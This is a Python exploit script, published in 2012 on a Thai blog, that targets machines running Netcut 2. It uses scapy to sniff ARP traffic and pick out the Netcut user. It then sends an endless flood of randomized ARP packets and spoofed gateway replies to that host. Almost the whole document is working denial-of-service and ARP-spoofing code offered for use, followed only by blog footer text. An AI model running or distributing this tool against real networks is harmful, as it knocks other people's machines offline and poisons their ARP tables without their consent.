#!/usr/bin/env python #Exploit Title: Netcut Denial of Service Vulnerability #Author: MaYaSeVeN #Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com) #Blog: http://mayaseven.blogspot.com #PoC: Video http://www.youtube.com/user/mayaseven #Picture http://3.bp.blogspot.com/-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png #Version: Netcut 2 #Software Link: http://www.mediafire.com/?jiiyq2wcpp41266 #Tested on: Windows Xp, Windows 7 #Greetz : ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf import commands,os,sys #gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2] gw_ip = commands.getoutput("ip route list | grep default").split()[2] def protect(gw_ip,gw_mac): os.popen("arp -s %s %s" %(gw_ip,gw_mac)) print "Protected himself" def detect(): ans = sniff(filter='arp',timeout=7) target=[] for r in ans.res: target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%")) return target def preattack(gw_ip): num = [] count = 0 target = 0 temp = 0 print "Detecting..." d = detect() for i in range(len(d)): if d[i].split()[0] == "255.255.255.255": num.append(d.count(d[i])) if d.count(d[i]) > count: count = d.count(d[i]) target = i if d[i].split()[0] == gw_ip: temp += 1 if len(d) < 7: print "[-] No one use Netcut or try again" exit() if len(num)*7 < temp: num[:] = [] count = 0 result = float(temp)/len(d)*100 for j in range(len(d)): if d[i].split()[0] == gw_ip: num.append(d.count(d[j])) if d.count(d[i]) > count: count = d.count(d[i]) target = i num.reverse() result = float(temp)/len(d)*100 print target else: num.reverse() result = float(num[0]+temp)/len(d)*100 print "There is a possibility that " + str(result) + "%" if result>= 50: target_mac = d[target].split()[1] target_ip = d[target].split()[2] print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac) attack(target_mac,target_ip,gw_ip) else: print "[-] No one use Netcut or try again" def attack(target_mac,target_ip,gw_ip): print "[+]Counter Attack !!!" e = Ether(dst="FF:FF:FF:FF:FF:FF") while 1: a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1) p = e/a/Padding("\x00"*18) sendp(p,verbose=0) a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2) p1 = e/a1/Padding("\x00"*18) sendp(p1,verbose=0) if __name__ == '__main__': os.system("clear") print "###################################################" print " __ __ __ __ _____ __ __ _ _" print "| \/ | \ \ / / / ____| \ \ / / | \ | |" print "| \ / | __ \ \_/ /_ _| (___ __\ \ / /__| \| |" print "| |\/| |/ _\ \ / _\ |\___ \ / _ \ \/ / _ \ . \ |" print "| | | | (_| || | (_| |____) | __/\ / __/ |\ |" print "|_| |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|" print " " print "###################################################" print "" print "http://mayaseven.blogspot.com" print "" if len(sys.argv) == 2 or len(sys.argv) == 3: if len(sys.argv) == 2: conf.iface=sys.argv[1] preattack(gw_ip) if len(sys.argv) == 3: conf.iface=sys.argv[1] gw_mac = sys.argv[2] protect(gw_ip,gw_mac) preattack(gw_ip) else: print '''Mode: 1.)Attack only Usage: NetcutKiller <Interface> e.g. NetcutKiller.py wlan0 2.)Attack with protect himself Usage: NetcutKiller <Interface> <MAC_Gateway> e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF ''' # 1337day.com [2012-01-04]Ref : http://mayaseven.blogspot.com :)
วันศุกร์ที่ 6 มกราคม พ.ศ. 2555
Netcut 2.0 Denial of Service Vulnerability
สมัครสมาชิก:
ส่งความคิดเห็น (Atom)
ไม่มีความคิดเห็น:
แสดงความคิดเห็น